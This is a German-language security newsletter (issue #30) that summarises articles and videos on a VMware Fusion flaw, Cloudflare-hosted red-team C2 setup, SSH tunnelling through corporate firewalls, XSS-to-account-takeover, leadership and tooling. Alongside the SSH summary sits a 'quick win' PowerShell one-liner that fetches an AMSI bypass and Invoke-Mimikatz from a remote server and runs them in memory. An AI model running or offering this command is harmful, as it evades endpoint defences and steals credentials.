Nord Nord Sec #30

Nord Nord Sec #30

Moin, Hallo, Ahoi und Herzlich Willkommen zur neuesten Ausgabe von Nord-Nord-Sec.

Da ist das Ding - 30 Ausgaben Nord Nord Sec! Zur Feier der Woche bin ich mal meinen Stapel an längeren Artikeln durchgegangen, die schon eine Weile herumlagen, und hab da ein paar Highlights für euch mitgebracht.

SSH Tunnel in die Cloud (Generiert mit leonardo.ai)

Viel Spass beim sichten der Artikel - und auf die nächsten 30 Ausgaben!

Cheers!

Artikel

⚡️Code Execution Vulnerability in VMWare Fusion Falls ihr VMWare Fusion unter macOS einsetzt - checkt eure Version und installiert das Update auf 13.6. In dieser Version wird eine CVE mit einem CVSSv3 Score von 8.8 behoben, die es Angreifern ermöglicht, eine Sicherheitslücke in Fusion auszunutzen, um Code im Kontext der Applikation ausführen zu könne.

☁️ Putting the C2 in C2loudflare Cloudflare-Konfigurationen in Kombination mit Azure-Snapshots und Tmux Resurrect ermöglichen eine schnelle und effiziente Bereitstellung von C2-Infrastrukturen. David Kennedy nimmt uns mit durch das Setup der Jumpsec Red Team Infrastruktur:

Der Einsatz von Cloudflare-Anwendungen als Zugangspunkte und die Implementierung von Zero-Trust-Prinzipien erhöhen die Sicherheit, während Cloudflare-Worker als serverlose Lösung die eingehenden Requests effizient umleiten. Mit dieser integrierten Lösung können Benutzer in nur fünf Minuten eine voll funktionsfähige C2-Umgebung (wieder) hochziehen.

🐚 SSH Tunneling to Punch Through Corporate Firewalls Sunny Chau liefert uns hier einen aktualisierten Blick auf die Nutzung von SSH Tunneln um durch Unternehmensfirewalls zu schlüpfen.

Die wichtigsten Aspekte betreffen dabei die Firewall-Einstellungen zu sichern, indem ausgehende Verbindungen auf Port 22 blockiert werden, sowie die Möglichkeit, über alternative Ports wie 80 oder 443 zu operieren. Richtig smart und eine Notiz wert, ist die Nutzung von Domain-Fronting, um Firewall-Beschränkungen zu umgehen und die Ausführung von PowerShell-Skripten über SSH zu ermöglichen.

Quick win für euch: EX (ssh user@server "/usr/bin/cat /home/user/amsibypass.ps1"); IEX (ssh user@server "/usr/bin/cat /home/user/invoke-mimikatz.ps1")

🧑‍🏫 On Leadership and Staying Technical Vermutlich kennen einige das Gefühl das sich bei ihnen einstellt, wenn sich herausstellt das die Führungskraft kein technisches Verständnis hat. Keith Hoodlet zäumt das Pferd vom andern Ende auf - und gibt (potenziellen) Führungspersonen Tips und Gründe mit, warum es sich lohnt, die technischen Aspekte ihrer Ausbildung nicht verkümmern zu lassen oder gar zu vergessen, wenn Sie ins Management wechseln. Hier eine kurze Zusammenfassung für euch:

Kleine, inkrementelle Fortschritte in der technischen Kompetenz summieren sich über die Zeit und sind für Führungskräfte von Vorteil. Regelmäßige, fokussierte Lernphasen ohne Ablenkungen fördern nicht nur das individuelle Wachstum, sondern stärken auch die Autorität und den Respekt als Führungskraft. Zudem ist es entscheidend, Wissen zu teilen und tiefgehendes Verständnis durch kritisches Lesen anstelle von oberflächlichem Konsum von Inhalten zu entwickeln.

6️⃣ The six most dangerous new threats security teams need to know about Alle Jahre wieder - kommen die Listen, mit den Top Angriffen/Gefahren/Whatever, denen sich IT Security Teams bewusst sein sollten. Auch hier ist (natürlich) die Verwendung von GenAI durch bösartige Akteure Teil des Problems. Aber auch wenn vier Punkte auf LLMs entfallen, bleiben noch zwei andere über: MFA umgehung durch MitM Angriffe und der generelle Mangel an fähigen (IT Security) Fachkräften. 71% der Firmen haben unbesetzte IT Security Stellen - was bedeutet, dass die eingesetzten Teams potenziell unterbesetzt und überarbeitet sind.

💻️ MNT Pocket Reform - Unboxing and first impressions Der MNT Pocket Reform ist ein kompakter, langlebiger Laptop, der auf Anpassbarkeit hin entwickelt wurde. Mit seiner mechanischen Tastatur und dem kleinen Trackball bietet er eine benutzerfreundliche und einzigartige Erfahrung. Der Autor hebt die solide Bauweise und die offene Plattform hervor, die zukünftige Upgrades ermöglicht und die Langlebigkeit des Geräts fördern.

Das Teil ist ja wohl mal sowas von sexy - Würde sich sicher gut in meinem Arsenal machen, allerdings bin ich so selten mobil unterwegs.

Video

🪂 HackTheBox - Skyfall Wieder was gelernt! Ein interessanter Deep Dive in eine Menge neuer Techniken und die Gelegenheit, sein Recon-Game zu verbessern.

🤑 BBRE - Turning unexploitable XSS into an account Takeover with Matan Berson Sehr coole Session, in der Matan Berson eine neuartige Technik erklärt, mit der er es geschaft hat ein Self-XSS zu einem 1-Click Account Takeover zu erweitern. Dabei nutzt er sowohl eine CSRF Schwachstelle aus, und zusätzlich nutzt er die Cookie Overflow Technik.

Absolute Empfehlung - schaut euch das an! For your convenience habe ich noch eine KI-Zusammenfassung erstellen lassen, die ihr hier findet.

Tools und Co.

🕶️ BushidoUK/Ransomware-Tool-Matrix Umfassende Auflistung von verschiedenen Ransomware Gangs und den Tools, die sie benutzen. Hilfreich für Threat Hunting, Threat Modelling, Incident Response und viel mehr 🤲 

🧑‍🏫 her0mareudeur/awesome-free-cybersecurity Lust bekommen, mehr über Cyber Security zu lernen? Here be dragons! Eine kleine aber feine Liste kostenloser Ressourcen, um euch tiefer in das Thema einzuarbeiten.

Never Stop Learning!

Dieses Zitat ist in meinem aktuellen Buch - Security Chaos Engineering von Kelly Shortridge - in meinem Gedächtnis geblieben. Die Erfahrung aus unzähligen Erlebnissen im Umgang mit Prozessen in Unternehmen….

When you perform security theatre, you’re optimizing - unsurprisingly - for drama.

Kelly Shortridge

Also dann - weniger Drama, mehr Lösungen! Haut rein und bis zum nächsten Mal 👋 

Cheers,

Martin

PS: Euch gefällt was ihr hier lest? Schaut auch mal bei meinen Empfehlungen vorbei!